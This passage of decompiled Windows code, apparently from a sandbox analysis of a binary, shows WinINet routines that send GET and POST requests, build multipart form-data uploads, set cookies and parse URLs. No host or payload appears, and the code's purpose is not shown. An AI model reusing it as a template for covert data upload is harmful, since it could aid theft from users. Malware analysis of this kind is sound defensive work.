                                                                                        				intOrPtr _v2492;
                                                                                        				intOrPtr _v2496;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t289;
                                                                                        				signed int _t290;
                                                                                        				signed int _t298;
                                                                                        				signed int _t299;
                                                                                        				void** _t301;
                                                                                        				signed int _t303;
                                                                                        				signed int _t304;
                                                                                        				signed int _t314;
                                                                                        				void* _t317;
                                                                                        				signed int _t320;
                                                                                        				signed int _t327;
                                                                                        				signed int _t330;
                                                                                        				signed int _t331;
                                                                                        				signed int _t332;
                                                                                        				signed int _t333;
                                                                                        				signed int _t334;
                                                                                        				signed int _t335;
                                                                                        				signed int _t336;
                                                                                        				signed int _t337;
                                                                                        				signed int _t338;
                                                                                        				signed int _t339;
                                                                                        				signed int _t342;
                                                                                        				signed int _t343;
                                                                                        				signed int _t346;
                                                                                        				signed int _t356;
                                                                                        				signed int _t360;
                                                                                        				signed int _t362;
                                                                                        				signed int _t363;
                                                                                        				signed int _t364;
                                                                                        				signed int _t374;
                                                                                        				signed int _t376;
                                                                                        				signed int _t377;
                                                                                        				signed int _t378;
                                                                                        				signed int _t379;
                                                                                        				signed int _t383;
                                                                                        				signed int _t385;
                                                                                        				signed int _t386;
                                                                                        				signed int _t387;
                                                                                        				signed int _t388;
                                                                                        				void* _t392;
                                                                                        				signed int _t393;
                                                                                        				void* _t394;
                                                                                        				long _t400;
                                                                                        				signed int _t402;
                                                                                        				signed int _t403;
                                                                                        				long _t408;
                                                                                        				signed int _t410;
                                                                                        				char* _t412;
                                                                                        				char _t414;
                                                                                        				signed int _t417;
                                                                                        				void** _t421;
                                                                                        				int _t425;
                                                                                        				void* _t429;
                                                                                        				signed int _t430;
                                                                                        				signed int _t431;
                                                                                        				signed int _t432;
                                                                                        				signed int _t439;
                                                                                        				signed int _t441;
                                                                                        				signed int _t442;
                                                                                        				signed int _t444;
                                                                                        				signed int _t445;
                                                                                        				signed int _t454;
                                                                                        				char* _t456;
                                                                                        				char _t458;
                                                                                        				signed int _t461;
                                                                                        				void** _t465;
                                                                                        				signed int _t469;
                                                                                        				void* _t473;
                                                                                        				int _t475;
                                                                                        				void* _t479;
                                                                                        				intOrPtr* _t481;
                                                                                        				intOrPtr _t483;
                                                                                        				intOrPtr _t486;
                                                                                        				void** _t490;
                                                                                        				void* _t496;
                                                                                        				char* _t497;
                                                                                        				intOrPtr* _t499;
                                                                                        				char* _t507;
                                                                                        				char* _t508;
                                                                                        				char* _t509;
                                                                                        				intOrPtr* _t510;
                                                                                        				intOrPtr* _t512;
                                                                                        				intOrPtr* _t514;
                                                                                        				intOrPtr* _t516;
                                                                                        				intOrPtr* _t518;
                                                                                        				intOrPtr* _t520;
                                                                                        				char _t521;
                                                                                        				signed int _t523;
                                                                                        				intOrPtr* _t524;
                                                                                        				intOrPtr* _t525;
                                                                                        				void* _t529;
                                                                                        				intOrPtr* _t530;
                                                                                        				signed int _t537;
                                                                                        				intOrPtr* _t540;
                                                                                        				intOrPtr* _t542;
                                                                                        				intOrPtr* _t544;
                                                                                        				void* _t547;
                                                                                        				void* _t549;
                                                                                        				intOrPtr* _t550;
                                                                                        				intOrPtr* _t552;
                                                                                        				intOrPtr* _t554;
                                                                                        				intOrPtr* _t556;
                                                                                        				intOrPtr* _t558;
                                                                                        				intOrPtr* _t560;
                                                                                        				char* _t569;
                                                                                        				intOrPtr* _t576;
                                                                                        				signed int _t577;
                                                                                        				char* _t581;
                                                                                        				intOrPtr* _t583;
                                                                                        				intOrPtr* _t590;
                                                                                        				signed int _t591;
                                                                                        				intOrPtr* _t601;
                                                                                        				char* _t605;
                                                                                        				char* _t606;
                                                                                        				char* _t607;
                                                                                        				void* _t608;
                                                                                        				void* _t609;
                                                                                        				void* _t610;
                                                                                        				void* _t611;
                                                                                        				signed int _t612;
                                                                                        				void* _t614;
                                                                                        				void* _t615;
                                                                                        				intOrPtr* _t616;
                                                                                        				signed int _t617;
                                                                                        				signed int _t619;
                                                                                        				void* _t620;
                                                                                        				void* _t621;
                                                                                        				void* _t622;
                                                                                        				void* _t623;
                                                                                        				void* _t624;
                                                                                        				void* _t625;
                                                                                        				void* _t626;
                                                                                        				void* _t627;
                                                                                        				void* _t628;
                                                                                        				char* _t629;
                                                                                        				void* _t630;
                                                                                        				char* _t631;
                                                                                        				char* _t632;
                                                                                        				void* _t633;
                                                                                        				void* _t634;
                                                                                        				char* _t635;
                                                                                        				void* _t636;
                                                                                        				char* _t637;
                                                                                        				void* _t639;
                                                                                        				char* _t640;
                                                                                        				char* _t641;
                                                                                        				signed int _t642;
                                                                                        				signed int _t644;
                                                                                        				void* _t645;
                                                                                        				signed int _t646;
                                                                                        				char* _t649;
                                                                                        				intOrPtr* _t650;
                                                                                        				char _t651;
                                                                                        				void* _t657;
                                                                                        				void* _t658;
                                                                                        				signed int _t659;
                                                                                        				char _t660;
                                                                                        				signed int _t661;
                                                                                        				void* _t662;
                                                                                        				void* _t664;
                                                                                        				void* _t666;
                                                                                        				signed int _t667;
                                                                                        				signed int _t672;
                                                                                        				signed int _t673;
                                                                                        				signed int _t674;
                                                                                        				signed int _t675;
                                                                                        				signed int _t676;
                                                                                        				void* _t677;
                                                                                        				signed int _t678;
                                                                                        				signed int _t679;
                                                                                        				signed int _t680;
                                                                                        				signed int _t681;
                                                                                        				void* _t682;
                                                                                        				void* _t683;
                                                                                        				void* _t697;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E8A8);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t678 = _t677 - 0x30;
                                                                                        				_t289 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t290 = _t289 ^ _t672;
                                                                                        				_v20 = _t290;
                                                                                        				_push(_t496);
                                                                                        				_push(_t290);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t639 = __ecx;
                                                                                        				_t507 =  *(__ecx + 8);
                                                                                        				_t657 = _a4;
                                                                                        				_t605 = _a8;
                                                                                        				if(_t507 == 0 || _t507 == 0xffffffff) {
                                                                                        					_push(0x199fac);
                                                                                        					_v60 = "handle not opened...";
                                                                                        					_push( &_v60);
                                                                                        					L0018C89A();
                                                                                        					goto L33;
                                                                                        				} else {
                                                                                        					_t496 = 0x4800000;
                                                                                        					_t472 =  ==  ? 0x4800000 : 0x4000000;
                                                                                        					_t473 = HttpOpenRequestA(_t507, "GET", _t657, "HTTP/1.0", _t605, 0x19d104,  ==  ? 0x4800000 : 0x4000000, 0); // executed
                                                                                        					 *(__ecx + 0xc) = _t473;
                                                                                        					if(_t473 == 0 || _t473 == 0xffffffff) {
                                                                                        						L36:
                                                                                        						_push(0x199fac);
                                                                                        						_v72 = "request failed...";
                                                                                        						_push( &_v72);
                                                                                        						L0018C89A();
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						_push(_t672);
                                                                                        						_t673 = _t678;
                                                                                        						_push(0xffffffff);
                                                                                        						_push(E0018E8DB);
                                                                                        						_push( *[fs:0x0]);
                                                                                        						_t679 = _t678 - 0x434;
                                                                                        						_t298 =  *0x19d05c; // 0x2c80d730
                                                                                        						_t299 = _t298 ^ _t673;
                                                                                        						_v140 = _t299;
                                                                                        						_push(_t496);
                                                                                        						_push(_t657);
                                                                                        						_push(_t639);
                                                                                        						_push(_t299);
                                                                                        						 *[fs:0x0] =  &_v136;
                                                                                        						_t640 = _t507;
                                                                                        						_t508 = _t640[8];
                                                                                        						_t497 = _v116;
                                                                                        						_t606 = _v112;
                                                                                        						_v1204 = 0;
                                                                                        						__eflags = _t508;
                                                                                        						if(_t508 == 0) {
                                                                                        							L81:
                                                                                        							_v1096 = "handle not opened...";
                                                                                        							goto L83;
                                                                                        						} else {
                                                                                        							__eflags = _t508 - 0xffffffff;
                                                                                        							if(_t508 == 0xffffffff) {
                                                                                        								goto L81;
                                                                                        							} else {
                                                                                        								__eflags = _t640[0x74] - 2;
                                                                                        								_t657 = 0x4c00040;
                                                                                        								_t428 =  ==  ? 0x4c00040 : 0x4400040;
                                                                                        								_t429 = HttpOpenRequestA(_t508, "POST", _t497, "HTTP/1.0", _t606, 0x19d110,  ==  ? 0x4c00040 : 0x4400040, 0);
                                                                                        								_t640[0xc] = _t429;
                                                                                        								__eflags = _t429;
                                                                                        								if(_t429 == 0) {
                                                                                        									L80:
                                                                                        									_v1096 = "request failed...";
                                                                                        									goto L83;
                                                                                        								} else {
                                                                                        									__eflags = _t429 - 0xffffffff;
                                                                                        									if(_t429 == 0xffffffff) {
                                                                                        										goto L80;
                                                                                        									} else {
                                                                                        										_t430 = HttpAddRequestHeadersA(_t429, "Accept: */*\r\n", 0xd, 0x80000000);
                                                                                        										__eflags = _t430;
                                                                                        										if(_t430 == 0) {
                                                                                        											L82:
                                                                                        											_v1096 = "additional header failed...";
                                                                                        											goto L83;
                                                                                        										} else {
                                                                                        											_t632 =  *0x19d114; // 0x191e08
                                                                                        											_t581 = _t632;
                                                                                        											_t61 =  &(_t581[1]); // 0x191e09
                                                                                        											_t657 = _t61;
                                                                                        											asm("o16 nop [eax+eax]");
                                                                                        											do {
                                                                                        												_t431 =  *_t581;
                                                                                        												_t581 =  &(_t581[1]);
                                                                                        												__eflags = _t431;
                                                                                        											} while (_t431 != 0);
                                                                                        											_t508 = _t581 - _t657;
                                                                                        											_t432 = HttpAddRequestHeadersA(_t640[0xc], _t632, _t508, 0x10000000);
                                                                                        											__eflags = _t432;
                                                                                        											if(_t432 == 0) {
                                                                                        												goto L82;
                                                                                        											} else {
                                                                                        												__eflags = _t640[0x84];
                                                                                        												if(_t640[0x84] <= 0) {
                                                                                        													L69:
                                                                                        													_t657 = E00185A90(_t640,  &_v1096, "--MULTI-PARTS-FORM-DATA-BOUNDARY");
                                                                                        													memset( &_v1068, 0, 0x400);
                                                                                        													E00185A20(_t640,  &_v1068, "Content-Length: %d\r\n", _t657);
                                                                                        													_t583 =  &_v1068;
                                                                                        													_t679 = _t679 + 0x18;
                                                                                        													_t633 = _t583 + 1;
                                                                                        													do {
                                                                                        														_t439 =  *_t583;
                                                                                        														_t583 = _t583 + 1;
                                                                                        														__eflags = _t439;
                                                                                        													} while (_t439 != 0);
                                                                                        													_t508 = _t583 - _t633;
                                                                                        													_t441 = HttpAddRequestHeadersA(_t640[0xc],  &_v1068, _t508, 0x10000000);
                                                                                        													__eflags = _t441;
                                                                                        													if(_t441 == 0) {
                                                                                        														goto L82;
                                                                                        													} else {
                                                                                        														 *0x19e024 = 0x28;
                                                                                        														 *0x19e028 = 0;
                                                                                        														_t442 = HttpSendRequestExA(_t640[0xc], 0x19e024, 0, 8, 0);
                                                                                        														__eflags = _t442;
                                                                                        														if(_t442 != 0) {
                                                                                        															_v1100 = 0;
                                                                                        															_t657 = _v1096;
                                                                                        															_t444 = InternetWriteFile(_t640[0xc], _t657, _t657,  &_v1100);
                                                                                        															__eflags = _t444;
                                                                                        															if(_t444 != 0) {
                                                                                        																_t445 = HttpEndRequestW(_t640[0xc], 0, 8, 0);
                                                                                        																_push(_t657);
                                                                                        																__eflags = _t445;
                                                                                        																if(_t445 != 0) {
                                                                                        																	HeapFree(GetProcessHeap(), 0, ??);
                                                                                        																	 *[fs:0x0] = _v28;
                                                                                        																	__eflags = _v32 ^ _t673;
                                                                                        																	return E001755F4(_v32 ^ _t673);
                                                                                        																} else {
                                                                                        																	_t508 = _t640;
                                                                                        																	E00186160();
                                                                                        																	_v1104 = "request failed";
                                                                                        																	_t301 =  &_v1104;
                                                                                        																	_push(0x199fac);
                                                                                        																	goto L84;
                                                                                        																}
                                                                                        															} else {
                                                                                        																_t508 = _t640;
                                                                                        																E00186160(_t657);
                                                                                        																_v1096 = "request failed";
                                                                                        																goto L83;
                                                                                        															}
                                                                                        														} else {
                                                                                        															_t508 = _t640;
                                                                                        															E00186160(_v1096);
                                                                                        															_v1096 = "request failed";
                                                                                        															goto L83;
                                                                                        														}
                                                                                        													}
                                                                                        												} else {
                                                                                        													_v1076 = 0;
                                                                                        													_v1072 = 0xf;
                                                                                        													_v1092 = 0;
                                                                                        													_v20 = 0;
                                                                                        													_t454 = _t640[0x74] - 1;
                                                                                        													__eflags = _t454;
                                                                                        													if(_t454 == 0) {
                                                                                        														_push(7);
                                                                                        														_push("http://");
                                                                                        														goto L49;
                                                                                        													} else {
                                                                                        														__eflags = _t454 == 1;
                                                                                        														if(_t454 == 1) {
                                                                                        															_push(8);
                                                                                        															_push("https://");
                                                                                        															L49:
                                                                                        															E00163450(_t497, _t632, _t640);
                                                                                        														}
                                                                                        													}
                                                                                        													__eflags = _t640[0x24] - 0x10;
                                                                                        													_t456 =  &(_t640[0x10]);
                                                                                        													if(_t640[0x24] >= 0x10) {
                                                                                        														_t456 =  *_t456;
                                                                                        													}
                                                                                        													_t589 =  &_v1092;
                                                                                        													E00177160( &_v1092, _t456);
                                                                                        													_t458 = _t640[0x74];
                                                                                        													__eflags = _t458 - 1;
                                                                                        													if(_t458 != 1) {
                                                                                        														__eflags = _t458 - 2;
                                                                                        														if(_t458 != 2) {
                                                                                        															goto L57;
                                                                                        														} else {
                                                                                        															__eflags = _t640[0x70] - 0x1bb;
                                                                                        															goto L56;
                                                                                        														}
                                                                                        													} else {
                                                                                        														__eflags = _t640[0x70] - 0x50;
                                                                                        														L56:
                                                                                        														if(__eflags != 0) {
                                                                                        															L57:
                                                                                        															_v36 = 0;
                                                                                        															asm("xorps xmm0, xmm0");
                                                                                        															asm("movq [ebp-0x1c], xmm0");
                                                                                        															E001859F0(_t589,  &_v44, ":%d", _t640[0x70]);
                                                                                        															_t590 =  &_v44;
                                                                                        															_t679 = _t679 + 0xc;
                                                                                        															_t634 = _t590 + 1;
                                                                                        															do {
                                                                                        																_t461 =  *_t590;
                                                                                        																_t590 = _t590 + 1;
                                                                                        																__eflags = _t461;
                                                                                        															} while (_t461 != 0);
                                                                                        															_t591 = _t590 - _t634;
                                                                                        															__eflags = _t591;
                                                                                        															_push(_t591);
                                                                                        															E001661B0( &_v1092,  &_v44);
                                                                                        														}
                                                                                        													}
                                                                                        													E00177160( &_v1092, _t497);
                                                                                        													_t465 = _t640[0x80];
                                                                                        													_t657 =  *_t465;
                                                                                        													__eflags = _t657 - _t465;
                                                                                        													if(_t657 == _t465) {
                                                                                        														L68:
                                                                                        														_v20 = 0xffffffff;
                                                                                        														E00162440( &_v1092, _t657);
                                                                                        														goto L69;
                                                                                        													} else {
                                                                                        														_t497 = InternetSetCookieA;
                                                                                        														asm("o16 nop [eax+eax]");
                                                                                        														while(1) {
                                                                                        															_t85 = _t657 + 8; // 0x3a657079
                                                                                        															_t508 =  *_t85;
                                                                                        															__eflags = _t508[0x2c] - 0x10;
                                                                                        															_t87 =  &(_t508[0x18]); // 0x3a657091
                                                                                        															_t635 = _t87;
                                                                                        															if(_t508[0x2c] >= 0x10) {
                                                                                        																_t635 =  *_t635;
                                                                                        															}
                                                                                        															__eflags = _t508[0x14] - 0x10;
                                                                                        															if(_t508[0x14] >= 0x10) {
                                                                                        																_t508 =  *_t508;
                                                                                        															}
                                                                                        															__eflags = _v1072 - 0x10;
                                                                                        															_t468 =  >=  ? _v1092 :  &_v1092;
                                                                                        															_t469 = InternetSetCookieA( >=  ? _v1092 :  &_v1092, _t508, _t635);
                                                                                        															__eflags = _t469;
                                                                                        															if(_t469 == 0) {
                                                                                        																break;
                                                                                        															}
                                                                                        															_t657 =  *_t657;
                                                                                        															__eflags = _t657 - _t640[0x80];
                                                                                        															if(_t657 != _t640[0x80]) {
                                                                                        																continue;
                                                                                        															} else {
                                                                                        																goto L68;
                                                                                        															}
                                                                                        															goto L220;
                                                                                        														}
                                                                                        														_v1096 = "add cookie failed...";
                                                                                        														L83:
                                                                                        														_push(0x199fac);
                                                                                        														_t301 =  &_v1096;
                                                                                        														L84:
                                                                                        														_push(_t301);
                                                                                        														L0018C89A();
                                                                                        														asm("int3");
                                                                                        														_push(_t673);
                                                                                        														_t674 = _t679;
                                                                                        														_push(0xffffffff);
                                                                                        														_push(E0018E8A8);
                                                                                        														_push( *[fs:0x0]);
                                                                                        														_t680 = _t679 - 0x30;
                                                                                        														_t303 =  *0x19d05c; // 0x2c80d730
                                                                                        														_t304 = _t303 ^ _t674;
                                                                                        														_v1256 = _t304;
                                                                                        														_push(_t497);
                                                                                        														_push(_t657);
                                                                                        														_push(_t640);
                                                                                        														_push(_t304);
                                                                                        														 *[fs:0x0] =  &_v1252;
                                                                                        														_t641 = _t508;
                                                                                        														_t509 = _t641[8];
                                                                                        														_t658 = _v1232;
                                                                                        														_t607 = _v1228;
                                                                                        														__eflags = _t509;
                                                                                        														if(_t509 == 0) {
                                                                                        															L119:
                                                                                        															_push(0x199fac);
                                                                                        															_v80 = "handle not opened...";
                                                                                        															_push( &_v80);
                                                                                        															L0018C89A();
                                                                                        															goto L120;
                                                                                        														} else {
                                                                                        															__eflags = _t509 - 0xffffffff;
                                                                                        															if(_t509 == 0xffffffff) {
                                                                                        																goto L119;
                                                                                        															} else {
                                                                                        																__eflags = _t641[0x74] - 2;
                                                                                        																_t497 = 0x4c00040;
                                                                                        																_t391 =  ==  ? 0x4c00040 : 0x4400040;
                                                                                        																_t392 = HttpOpenRequestA(_t509, "POST", _t658, "HTTP/1.0", _t607, 0x19d108,  ==  ? 0x4c00040 : 0x4400040, 0);
                                                                                        																_t641[0xc] = _t392;
                                                                                        																__eflags = _t392;
                                                                                        																if(_t392 == 0) {
                                                                                        																	L123:
                                                                                        																	_push(0x199fac);
                                                                                        																	_v80 = "request failed...";
                                                                                        																	_push( &_v80);
                                                                                        																	L0018C89A();
                                                                                        																	asm("int3");
                                                                                        																	asm("int3");
                                                                                        																	asm("int3");
                                                                                        																	asm("int3");
                                                                                        																	asm("int3");
                                                                                        																	_push(_t674);
                                                                                        																	_t675 = _t680;
                                                                                        																	_push(0xffffffff);
                                                                                        																	_push(E0018E910);
                                                                                        																	_push( *[fs:0x0]);
                                                                                        																	_t681 = _t680 - 0x18;
                                                                                        																	_push(_t497);
                                                                                        																	_push(_t658);
                                                                                        																	_push(_t641);
                                                                                        																	_t314 =  *0x19d05c; // 0x2c80d730
                                                                                        																	_push(_t314 ^ _t675);
                                                                                        																	 *[fs:0x0] =  &_v1372;
                                                                                        																	_v1376 = _t681;
                                                                                        																	_v1380 = _t509;
                                                                                        																	_t317 = _t509[0xc];
                                                                                        																	_v1384 = 0;
                                                                                        																	_v1364 = 0;
                                                                                        																	__eflags = _t317;
                                                                                        																	if(_t317 == 0) {
                                                                                        																		_push(0x199fac);
                                                                                        																		_v56 = "connection failed...";
                                                                                        																		_push( &_v56);
                                                                                        																		L0018C89A();
                                                                                        																		goto L129;
                                                                                        																	} else {
                                                                                        																		_t387 = InternetReadFile(_t317, _v20, _v16,  &_v52); // executed
                                                                                        																		__eflags = _t387;
                                                                                        																		if(_t387 == 0) {
                                                                                        																			L129:
                                                                                        																			_push(0x199fac);
                                                                                        																			_v60 = "response failed...";
                                                                                        																			_push( &_v60);
                                                                                        																			L0018C89A();
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			asm("int3");
                                                                                        																			_push(_t675);
                                                                                        																			_t676 = _t681;
                                                                                        																			_t682 = _t681 - 0x428;
                                                                                        																			_t320 =  *0x19d05c; // 0x2c80d730
                                                                                        																			_v1436 = _t320 ^ _t676;
                                                                                        																			_v2488 = _v1416;
                                                                                        																			_push(0);
                                                                                        																			_t499 = _v1424;
                                                                                        																			_t510 = _t499;
                                                                                        																			_v2492 = _v1412;
                                                                                        																			_push(_t658);
                                                                                        																			_v2484 = _v1408;
                                                                                        																			_t608 = _t510 + 1;
                                                                                        																			_t659 = 0;
                                                                                        																			__eflags = 0;
                                                                                        																			_push(_t641);
                                                                                        																			_t642 = _v1420;
                                                                                        																			_v2480 = _v1404;
                                                                                        																			_v2476 = _t642;
                                                                                        																			_v2496 = _v1400;
                                                                                        																			_v2461 = 0;
                                                                                        																			do {
                                                                                        																				_t327 =  *_t510;
                                                                                        																				_t510 = _t510 + 1;
                                                                                        																				__eflags = _t327;
                                                                                        																			} while (_t327 != 0);
                                                                                        																			__eflags = _t510 != _t608;
                                                                                        																			if(_t510 != _t608) {
                                                                                        																				do {
                                                                                        																					_t558 = _t499;
                                                                                        																					_t627 = _t558 + 1;
                                                                                        																					do {
                                                                                        																						_t383 =  *_t558;
                                                                                        																						_t558 = _t558 + 1;
                                                                                        																						__eflags = _t383;
                                                                                        																					} while (_t383 != 0);
                                                                                        																					__eflags = _t659 - _t558 - _t627;
                                                                                        																					if(_t659 < _t558 - _t627) {
                                                                                        																						_t385 = strncmp(_t499 + _t659, ":", 1);
                                                                                        																						_t682 = _t682 + 0xc;
                                                                                        																						__eflags = _t385;
                                                                                        																						if(_t385 != 0) {
                                                                                        																							_t560 = _t499;
                                                                                        																							_t659 = _t659 + 1;
                                                                                        																							__eflags = _t659;
                                                                                        																							_t628 = _t560 + 1;
                                                                                        																							do {
                                                                                        																								_t386 =  *_t560;
                                                                                        																								_t560 = _t560 + 1;
                                                                                        																								__eflags = _t386;
                                                                                        																							} while (_t386 != 0);
                                                                                        																							goto L140;
                                                                                        																						}
                                                                                        																					}
                                                                                        																					goto L141;
                                                                                        																					L140:
                                                                                        																					__eflags = _t560 != _t628;
                                                                                        																				} while (_t560 != _t628);
                                                                                        																			}
                                                                                        																			L141:
                                                                                        																			_t330 = strncmp(_t499 + 1 + _t659, "/", 1);
                                                                                        																			_t512 = __imp__strncpy_s;
                                                                                        																			_t683 = _t682 + 0xc;
                                                                                        																			__eflags = _t330;
                                                                                        																			if(_t330 != 0) {
                                                                                        																				__eflags = _t642;
                                                                                        																				if(_t642 != 0) {
                                                                                        																					 *_t512(_t642, 5, "http", 4);
                                                                                        																					_t683 = _t683 + 0x10;
                                                                                        																					 *((char*)(_t642 + 5)) = 0;
                                                                                        																				}
                                                                                        																				_t331 = _v1061;
                                                                                        																			} else {
                                                                                        																				__eflags = _t642;
                                                                                        																				if(_t642 != 0) {
                                                                                        																					_t215 = _t659 + 1; // 0x2
                                                                                        																					 *_t512(_t642, _t215, _t499, _t659);
                                                                                        																					_t683 = _t683 + 0x10;
                                                                                        																					 *((char*)(_t642 + _t659)) = 0;
                                                                                        																				}
                                                                                        																				_t331 = 1;
                                                                                        																			}
                                                                                        																			_t219 = _t659 + 3; // 0x3
                                                                                        																			__eflags = _t331;
                                                                                        																			_t644 =  ==  ? 0 : _t219;
                                                                                        																			_t514 = _t499;
                                                                                        																			_v1072 = _t644;
                                                                                        																			_t609 = _t514 + 1;
                                                                                        																			do {
                                                                                        																				_t332 =  *_t514;
                                                                                        																				_t514 = _t514 + 1;
                                                                                        																				__eflags = _t332;
                                                                                        																			} while (_t332 != 0);
                                                                                        																			_v1068 = _t644;
                                                                                        																			_t660 = _t644;
                                                                                        																			__eflags = _t514 != _t609;
                                                                                        																			if(_t514 != _t609) {
                                                                                        																				do {
                                                                                        																					_t554 = _t499;
                                                                                        																					_t625 = _t554 + 1;
                                                                                        																					do {
                                                                                        																						_t378 =  *_t554;
                                                                                        																						_t554 = _t554 + 1;
                                                                                        																						__eflags = _t378;
                                                                                        																					} while (_t378 != 0);
                                                                                        																					__eflags = _t660 - _t554 - _t625;
                                                                                        																					if(_t660 < _t554 - _t625) {
                                                                                        																						_t556 = _t499;
                                                                                        																						_t660 = _t660 + 1;
                                                                                        																						__eflags = _t660;
                                                                                        																						_t626 = _t556 + 1;
                                                                                        																						do {
                                                                                        																							_t379 =  *_t556;
                                                                                        																							_t556 = _t556 + 1;
                                                                                        																							__eflags = _t379;
                                                                                        																						} while (_t379 != 0);
                                                                                        																						goto L156;
                                                                                        																					}
                                                                                        																					break;
                                                                                        																					L156:
                                                                                        																					__eflags = _t556 != _t626;
                                                                                        																				} while (_t556 != _t626);
                                                                                        																				_v1068 = _t660;
                                                                                        																			}
                                                                                        																			_t516 = _t499;
                                                                                        																			_t610 = _t516 + 1;
                                                                                        																			do {
                                                                                        																				_t333 =  *_t516;
                                                                                        																				_t516 = _t516 + 1;
                                                                                        																				__eflags = _t333;
                                                                                        																			} while (_t333 != 0);
                                                                                        																			__eflags = _t660 - _t516 - _t610;
                                                                                        																			if(_t660 < _t516 - _t610) {
                                                                                        																				_t544 = _t499;
                                                                                        																				_t667 = _t644;
                                                                                        																				_t622 = _t544 + 1;
                                                                                        																				do {
                                                                                        																					_t364 =  *_t544;
                                                                                        																					_t544 = _t544 + 1;
                                                                                        																					__eflags = _t364;
                                                                                        																				} while (_t364 != 0);
                                                                                        																				__eflags = _t544 != _t622;
                                                                                        																				if(_t544 != _t622) {
                                                                                        																					do {
                                                                                        																						_t550 = _t499;
                                                                                        																						_t623 = _t550 + 1;
                                                                                        																						do {
                                                                                        																							_t374 =  *_t550;
                                                                                        																							_t550 = _t550 + 1;
                                                                                        																							__eflags = _t374;
                                                                                        																						} while (_t374 != 0);
                                                                                        																						__eflags = _t644 - _t550 - _t623;
                                                                                        																						if(_t644 < _t550 - _t623) {
                                                                                        																							_t376 = strncmp(_t499 + _t667, ":", 1);
                                                                                        																							_t683 = _t683 + 0xc;
                                                                                        																							__eflags = _t376;
                                                                                        																							if(_t376 != 0) {
                                                                                        																								_t552 = _t499;
                                                                                        																								_t667 = _t667 + 1;
                                                                                        																								__eflags = _t667;
                                                                                        																								_t624 = _t552 + 1;
                                                                                        																								do {
                                                                                        																									_t377 =  *_t552;
                                                                                        																									_t552 = _t552 + 1;
                                                                                        																									__eflags = _t377;
                                                                                        																								} while (_t377 != 0);
                                                                                        																								goto L170;
                                                                                        																							}
                                                                                        																						}
                                                                                        																						goto L171;
                                                                                        																						L170:
                                                                                        																						__eflags = _t552 != _t624;
                                                                                        																					} while (_t552 != _t624);
                                                                                        																				}
                                                                                        																				L171:
                                                                                        																				__eflags = _t667 - _v1068;
                                                                                        																				if(_t667 >= _v1068) {
                                                                                        																					_t651 = _v1068;
                                                                                        																				} else {
                                                                                        																					_t547 = _t667 - _t644;
                                                                                        																					__imp__strncpy_s(_v1088, _t547 + 1, _t644 + _t499, _t547);
                                                                                        																					_t651 = _v1068;
                                                                                        																					_t549 = _t651 - _t667;
                                                                                        																					 *((char*)(_v1088 - _t644 + _t667 + 1)) = 0;
                                                                                        																					__imp__strncpy_s(_v1092, _t549, _t499 + 1 + _t667, _t549 - 1);
                                                                                        																					_t683 = _t683 + 0x20;
                                                                                        																					 *((char*)(_v1092 - _t667 + _t651)) = 0;
                                                                                        																				}
                                                                                        																				_t644 = _t651 + 1;
                                                                                        																				__eflags = _t644;
                                                                                        																				_v1072 = _t644;
                                                                                        																			}
                                                                                        																			_t518 = _t499;
                                                                                        																			_v1068 = _t644;
                                                                                        																			_t661 = _t644;
                                                                                        																			_v1088 = _t661;
                                                                                        																			_t611 = _t518 + 1;
                                                                                        																			do {
                                                                                        																				_t334 =  *_t518;
                                                                                        																				_t518 = _t518 + 1;
                                                                                        																				__eflags = _t334;
                                                                                        																			} while (_t334 != 0);
                                                                                        																			__eflags = _t518 != _t611;
                                                                                        																			if(_t518 != _t611) {
                                                                                        																				do {
                                                                                        																					_t540 = _t499;
                                                                                        																					_t620 = _t540 + 1;
                                                                                        																					do {
                                                                                        																						_t360 =  *_t540;
                                                                                        																						_t540 = _t540 + 1;
                                                                                        																						__eflags = _t360;
                                                                                        																					} while (_t360 != 0);
                                                                                        																					__eflags = _t644 - _t540 - _t620;
                                                                                        																					if(_t644 < _t540 - _t620) {
                                                                                        																						_t362 = strncmp(_t499 + _t644, "/", 1);
                                                                                        																						_t683 = _t683 + 0xc;
                                                                                        																						__eflags = _t362;
                                                                                        																						if(_t362 != 0) {
                                                                                        																							_t542 = _t499;
                                                                                        																							_t644 = _t644 + 1;
                                                                                        																							__eflags = _t644;
                                                                                        																							_t621 = _t542 + 1;
                                                                                        																							do {
                                                                                        																								_t363 =  *_t542;
                                                                                        																								_t542 = _t542 + 1;
                                                                                        																								__eflags = _t363;
                                                                                        																							} while (_t363 != 0);
                                                                                        																							goto L185;
                                                                                        																						}
                                                                                        																					}
                                                                                        																					break;
                                                                                        																					L185:
                                                                                        																					__eflags = _t542 != _t621;
                                                                                        																				} while (_t542 != _t621);
                                                                                        																				_v1072 = _t644;
                                                                                        																			}
                                                                                        																			__eflags = _t661 - _t644;
                                                                                        																			if(_t661 > _t644) {
                                                                                        																				L190:
                                                                                        																				_t335 = _v1076;
                                                                                        																				_t520 = "https";
                                                                                        																				while(1) {
                                                                                        																					_t612 =  *_t335;
                                                                                        																					__eflags = _t612 -  *_t520;
                                                                                        																					if(_t612 !=  *_t520) {
                                                                                        																						break;
                                                                                        																					}
                                                                                        																					__eflags = _t612;
                                                                                        																					if(_t612 == 0) {
                                                                                        																						L195:
                                                                                        																						_t336 = 0;
                                                                                        																					} else {
                                                                                        																						_t619 =  *((intOrPtr*)(_t335 + 1));
                                                                                        																						__eflags = _t619 -  *((intOrPtr*)(_t520 + 1));
                                                                                        																						if(_t619 !=  *((intOrPtr*)(_t520 + 1))) {
                                                                                        																							break;
                                                                                        																						} else {
                                                                                        																							_t335 = _t335 + 2;
                                                                                        																							_t520 = _t520 + 2;
                                                                                        																							__eflags = _t619;
                                                                                        																							if(_t619 != 0) {
                                                                                        																								continue;
                                                                                        																							} else {
                                                                                        																								goto L195;
                                                                                        																							}
                                                                                        																						}
